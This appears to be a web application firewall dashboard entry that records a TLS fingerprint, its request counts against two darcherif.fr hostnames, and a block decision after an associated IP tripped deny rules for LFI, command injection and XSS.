Investigation Workspace

Entity: 3%7ed09afd3ffe9bdf7b (Tls)

Entity Details
Type: Tls
Linked Entities
IPs Linked to TLS Fingerprint (50)
Hostnames Targeted
Hostname             Request Count
www.darcherif.fr     1928
akamai.darcherif.fr  63
Paths Targeted (with Hostname Counts)
🚫 Block

Associated with IP 134.122.136.96, which triggered multiple critical WAF deny rules including LFI, command injection, XSS, and bot impersonation. This TLS fingerprint is used by a highly malicious client.

2025-11-30 14:03:57